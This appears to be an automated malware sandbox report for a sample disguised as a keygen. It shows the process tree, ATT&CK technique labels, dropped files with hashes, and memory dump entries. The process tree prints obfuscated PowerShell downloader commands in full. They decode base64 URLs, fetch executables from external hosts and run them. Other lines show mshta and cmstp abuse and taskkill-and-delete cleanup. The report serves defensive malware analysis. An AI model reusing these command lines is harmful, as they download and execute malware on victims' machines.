'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:2288

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644

C:\Users\Public\fot.exe
"C:\Users\Public\fot.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5092

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4292

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4860

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4500

C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 4880 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\387048281062832\\* & exit
8⤵
PID:4172

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 4880
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Users\Public\fot.exe
"C:\Users\Public\fot.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4616

C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe
"C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe
"C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe"
8⤵
- Executes dropped EXE
PID:4432

C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe
"C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe"
7⤵
- Executes dropped EXE
PID:2840

C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe
"C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe
"C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4316

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\tqb2hofu.inf
9⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe
"C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe
"C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe"
8⤵
- Executes dropped EXE
- Windows security modification
PID:4632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\fot.exe"
7⤵
PID:4208

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:4416

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\temp\r5e4qhbt.exe
2⤵
PID:4756

C:\Windows\temp\r5e4qhbt.exe
C:\Windows\temp\r5e4qhbt.exe
3⤵
- Executes dropped EXE
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:196

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\freebl3.dll

Download Submit
C:\ProgramData\freebl3.dll

Download Submit
C:\ProgramData\mozglue.dll

Download Submit
C:\ProgramData\mozglue.dll

Download Submit
C:\ProgramData\msvcp140.dll

Download Submit
C:\ProgramData\msvcp140.dll

Download Submit
C:\ProgramData\nss3.dll

Download Submit
C:\ProgramData\nss3.dll

Download Submit
C:\ProgramData\sqlite3.dll

Download Submit
C:\ProgramData\sqlite3.dll

Download Submit
C:\ProgramData\vcruntime140.dll

Download Submit
C:\ProgramData\vcruntime140.dll

Download Submit
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll

Download Submit
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll

Download Submit
C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Zr1WB723b.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2n8XBQMHQS.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4pTGHGA26G.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZvENb6ggC9.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lhIx28u9ZV.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download Submit
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\0Zr1WB723b.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\2n8XBQMHQS.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\4pTGHGA26G.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\6CSy5t5Akv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\6CSy5t5Akv.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\b1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\ba1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\m1.hta

Download Submit
C:\Users\Admin\AppData\Local\Temp\B50D.tmp\start.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\EVRNYPOSLL.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\EVRNYPOSLL.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\EVRNYPOSLL.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ErIxQphJLi.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZvENb6ggC9.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\lhIx28u9ZV.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe

Download Submit
C:\Users\Public\fot.exe

Download Submit
C:\Users\Public\fot.exe

Download Submit
C:\Users\Public\fot.exe

Download Submit
C:\Users\Public\igu.exe

Download Submit
C:\Users\Public\igu.exe

Download Submit
C:\Users\Public\igu.exe

Download Submit
C:\Users\Public\iuy.exe

Download Submit
C:\Users\Public\iuy.exe

Download Submit
C:\Users\Public\iuy.exe

Download Submit
C:\Users\Public\iuy.exe

Download Submit
C:\Windows\Temp\r5e4qhbt.exe

MD5
f4b5c1ebf4966256f52c4c4ceae87fb1

SHA1
ca70ec96d1a65cb2a4cbf4db46042275dc75813b

SHA256
88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

SHA512
02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

Download Submit
C:\Windows\temp\r5e4qhbt.exe

MD5
f4b5c1ebf4966256f52c4c4ceae87fb1

SHA1
ca70ec96d1a65cb2a4cbf4db46042275dc75813b

SHA256
88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

SHA512
02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

Download Submit
C:\Windows\temp\tqb2hofu.inf

Download Submit
C:\Windows\temp\xsl1osah.inf

Download Submit
\ProgramData\mozglue.dll

Download Submit
\ProgramData\mozglue.dll

Download Submit
\ProgramData\nss3.dll

Download Submit
\ProgramData\nss3.dll

Download Submit
\ProgramData\sqlite3.dll

Download Submit
\ProgramData\sqlite3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll

Download Submit
memory/192-22-0x0000000000000000-mapping.dmp

Download
memory/192-27-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/196-330-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/196-322-0x0000000000000000-mapping.dmp

Download
memory/196-331-0x000001AA74560000-0x000001AA74561000-memory.dmp

Filesize
4KB

Download
memory/196-332-0x000001AA747F0000-0x000001AA747F1000-memory.dmp

Filesize
4KB

Download
memory/500-640-0x0000000000000000-mapping.dmp

Download
memory/500-645-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/500-653-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/796-14-0x0000000000000000-mapping.dmp

Download
memory/1248-365-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/1248-357-0x0000000000000000-mapping.dmp

Download
memory/1272-81-0x0000000007E70000-0x0000000007E71000-memory.dmp

Filesize
4KB

Download
memory/1272-21-0x0000000000000000-mapping.dmp

Download
memory/1272-32-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/1512-310-0x0000000000000000-mapping.dmp

Download
memory/1512-311-0x0000000000000000-mapping.dmp

Download
memory/1512-314-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/1512-317-0x0000000000840000-0x0000000000841000-memory.dmp

Filesize
4KB

Download
memory/1744-380-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/1744-378-0x0000000000000000-mapping.dmp

Download
memory/2172-12-0x0000000000000000-mapping.dmp

Download
memory/2288-15-0x0000000000000000-mapping.dmp

Download
memory/2392-315-0x0000000000000000-mapping.dmp

Download
memory/2584-3-0x0000000000000000-mapping.dmp

Download
memory/2584-2-0x0000000000000000-mapping.dmp

Download
memory/2644-45-0x00000000071A0000-0x00000000071A1000-memory.dmp

Filesize
4KB

Download
memory/2644-87-0x00000000097F0000-0x00000000097F1000-memory.dmp

Filesize
4KB

Download
memory/2644-29-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/2644-24-0x0000000000000000-mapping.dmp

Download
memory/2800-7-0x0000000000000000-mapping.dmp

Download
memory/2840-478-0x0000000004C20000-0x0000000004C71000-memory.dmp

Filesize
324KB

Download
memory/2840-316-0x0000000004180000-0x00000000041DC000-memory.dmp

Filesize
368KB

Download
memory/2840-228-0x0000000000000000-mapping.dmp

Download
memory/2896-23-0x0000000000000000-mapping.dmp

Download
memory/2896-33-0x00000000036E0000-0x00000000036E1000-memory.dmp

Filesize
4KB

Download
memory/2896-28-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/3084-257-0x0000000000000000-mapping.dmp

Download
memory/3096-353-0x0000000000000000-mapping.dmp

Download
memory/3096-359-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/3300-259-0x0000000000000000-mapping.dmp

Download
memory/3456-0-0x0000000000000000-mapping.dmp

Download
memory/3520-57-0x0000000008060000-0x0000000008061000-memory.dmp

Filesize
4KB

Download
memory/3520-99-0x0000000009BF0000-0x0000000009BF1000-memory.dmp

Filesize
4KB

Download
memory/3520-100-0x00000000095F0000-0x00000000095F1000-memory.dmp

Filesize
4KB

Download
memory/3520-101-0x000000000AB60000-0x000000000AB61000-memory.dmp

Filesize
4KB

Download
memory/3520-93-0x0000000008AF0000-0x0000000008AF1000-memory.dmp

Filesize
4KB

Download
memory/3520-69-0x0000000008420000-0x0000000008421000-memory.dmp

Filesize
4KB

Download
memory/3520-40-0x00000000077A0000-0x00000000077A1000-memory.dmp

Filesize
4KB

Download
memory/3520-64-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/3520-30-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/3520-26-0x0000000000000000-mapping.dmp

Download
memory/3568-31-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/3568-25-0x0000000000000000-mapping.dmp

Download
memory/3568-51-0x0000000008070000-0x0000000008071000-memory.dmp

Filesize
4KB

Download
memory/3568-75-0x00000000085C0000-0x00000000085C1000-memory.dmp

Filesize
4KB

Download
memory/3580-396-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/3580-391-0x0000000000000000-mapping.dmp

Download
memory/3756-10-0x0000000000000000-mapping.dmp

Download
memory/3776-340-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/3776-344-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/3776-342-0x000000000043FA56-mapping.dmp

Download
memory/3840-9-0x0000000000000000-mapping.dmp

Download
memory/3876-356-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/3876-352-0x0000000000000000-mapping.dmp

Download
memory/3880-18-0x0000000000000000-mapping.dmp

Download
memory/3900-502-0x0000000000000000-mapping.dmp

Download
memory/3916-260-0x0000000000000000-mapping.dmp

Download
memory/4056-20-0x0000000000000000-mapping.dmp

Download
memory/4132-237-0x0000000000000000-mapping.dmp

Download
memory/4132-245-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/4132-243-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/4132-272-0x0000000005990000-0x00000000059CC000-memory.dmp

Filesize
240KB

Download
memory/4172-256-0x0000000000000000-mapping.dmp

Download
memory/4204-385-0x0000000000000000-mapping.dmp

Download
memory/4204-388-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/4208-239-0x0000000000000000-mapping.dmp

Download
memory/4292-144-0x0000000000000000-mapping.dmp

Download
memory/4316-277-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/4316-275-0x000000000040616E-mapping.dmp

Download
memory/4316-273-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4352-579-0x000000000040616E-mapping.dmp

Download
memory/4352-585-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/4404-606-0x00000000050E0000-0x00000000051E1000-memory.dmp

Filesize
1.0MB

Download
memory/4404-598-0x0000000000000000-mapping.dmp

Download
memory/4408-381-0x0000000000000000-mapping.dmp

Download
memory/4408-384-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/4412-232-0x0000000000000000-mapping.dmp

Download
memory/4412-236-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/4412-270-0x0000000005650000-0x000000000568D000-memory.dmp

Filesize
244KB

Download
memory/4412-235-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/4416-251-0x0000000000000000-mapping.dmp

Download
memory/4432-263-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4432-264-0x000000000040C76E-mapping.dmp

Download
memory/4432-267-0x0000000070A80000-0x000000007116E000-memory.dmp

Filesize
6.9MB

Download
memory/4460-371-0x00007FFD88FA0000-0x00007FFD8998C000-memory.dmp

Filesize
9.9MB

Download
memory/4460-360-0x0000000000000000-mapping.dmp

Download
memory/4480-145-0x0000000000000000-mapping.dmp

Download
memory/4500-151-0x0000000000000000-mapping.dmp

Download
memory/4504-294-0x0000000004720000-0x0000000004721000-memory.dmp

Filesize
4KB

Download
memory/4504-291-0x0000000004640000-0x0000000004641000-memory.dmp

Filesize
4KB

Download
memory/4504-288-0x0000000000000000-mapping.dmp

Download
memory/4544-150-0x0000000000000000-mapping.dmp

Download
memory/4552-358-0x0000000000000000-mapping.dmp

Download
